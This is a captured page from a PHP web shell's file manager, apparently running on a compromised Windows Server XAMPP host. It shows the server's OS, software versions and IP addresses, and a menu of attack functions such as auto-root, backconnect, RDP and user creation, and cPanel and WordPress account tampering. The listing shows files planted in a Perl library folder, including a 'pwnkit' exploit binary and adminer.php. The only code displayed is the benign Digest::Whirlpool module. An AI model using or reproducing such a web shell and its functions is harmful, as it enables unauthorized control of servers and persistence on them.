Windows NT IZOXMIX7871CBCZ 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
: 172.23.17.241 | : 216.73.216.183
Cant Read [ /etc/named.conf ]
8.2.12
Administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
C: /
xampp /
perl /
vendor /
lib /
Digest /
[ HOME SHELL ]
Name
Size
Permission
Action
OMAC
[ DIR ]
drwxrwxrwx
Perl
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-rw-rw-
CMAC.pm
3.13
KB
-rw-rw-rw-
HMAC.pm
2.82
KB
-rw-rw-rw-
HMAC_MD5.pm
1.09
KB
-rw-rw-rw-
HMAC_SHA1.pm
1.14
KB
-rw-rw-rw-
MD2.pm
1.33
KB
-rw-rw-rw-
OMAC1.pm
447
B
-rw-rw-rw-
OMAC2.pm
1.25
KB
-rw-rw-rw-
SHA1.pm
6.92
KB
-rw-rw-rw-
Whirlpool.pm
3.23
KB
-rw-rw-rw-
adminer.php
465.43
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Whirlpool.pm
package Digest::Whirlpool; use strict; use warnings; use base 'Digest::base'; use XSLoader (); BEGIN { our $VERSION = '2.04'; XSLoader::load __PACKAGE__, $VERSION; # Pre-1.0.4 used base64digest, maintain API compatibility with it. *base64digest = \&Digest::base::b64digest; } 1; __END__ =head1 NAME Digest::Whirlpool - A 512-bit, collision-resistant, one-way hash function =head1 ABSTRACT WHIRLPOOL is a 512-bit, collision-resistant, one-way hash function developed by Paulo S. L. M. Barreto and Vincent Rijmen. It has been recommended by the NESSIE project (along with SHA-256/384/512) and adopted as ISO/IEC 10118-3. =head1 SYNOPSIS In programs: # Using L<Digest> (recommended) use Digest; my $whirlpool = Digest->new( 'Whirlpool' ); # Get a hash and reset the object $whirlpool->add( "hash this" ); my $hexdigest = $whirlpool->hexdigest; # Populate the object again, and clone it before getting the # digest to avoid resetting $whirlpool->add( "hash this" ); my $b64digest = $whirlpool->clone->b64digest; $whirlpool->add( "add this to the hash" ); # Using this module directly (same interface) use Digest::Whirlpool; my $whirlpool = Digest->new( 'Whirlpool' ); $whirlpool->add( ... ); .... From the command line: whirlpoolsum files whirlpoolsum --help =head1 DESCRIPTION Provides an interface to the WHIRLPOOL hash algorithm. This module subclasses L<Digest::base> and can be used either directly or through the L<Digest> meta-module. Using the latter is recommended. =head1 EXPORT None. =head1 METHODS Since this module implements the standard L<Digest interface|Digest/"OO INTERFACE"> and should be used through the L<Digest> module you should look at that documentation for the general interface, below is a description of methods that differ. =head2 clone Copy the internal state of the current object into a new object and return it. =head2 reset Resets the object to the same internal state it was in when it was constructed. This works exactly like L</new> except it doesn't allocate new memory for its internal state. =head2 base64digest An legacy alias for the B<b64digest> method which should be used instead. =head2 hashsize Returns the size (in bits) of a WHIRLPOOL hash, i.e. 512. =cut =head1 SEE ALSO =over 4 =item NESSIE consortium, I<Portfolio of recommended cryptographic primitives>, February 27, 2003. =item L<http://paginas.terra.com.br/informatica/paulobarreto/WhirlpoolPage.html> =back =head1 AUTHORS & HISTORY The original version of this package was written by Julius C. Duque in 2003. It was rewritten by E<AElig>var ArnfjE<ouml>rE<eth> Bjarmason <avar@cpan.org> in January 2007 who added compatability with the Digest interface, improved documentation and a L<whirlpoolsum(1)> command-line utility amongst other things. =head1 BUGS Please report any bugs that aren't already listed at L<http://rt.cpan.org/Dist/Display.html?Queue=Digest-Whirlpool> to L<http://rt.cpan.org/Public/Bug/Report.html?Queue=Digest-Whirlpool> =head1 LICENSE This program is free software; you can redistribute it and/or modify it under the same terms as Perl itself. Copyright 2003 Julius C. Duque and 2007 and 2009 E<AElig>var ArnfjE<ouml>rE<eth> Bjarmason. =cut
Close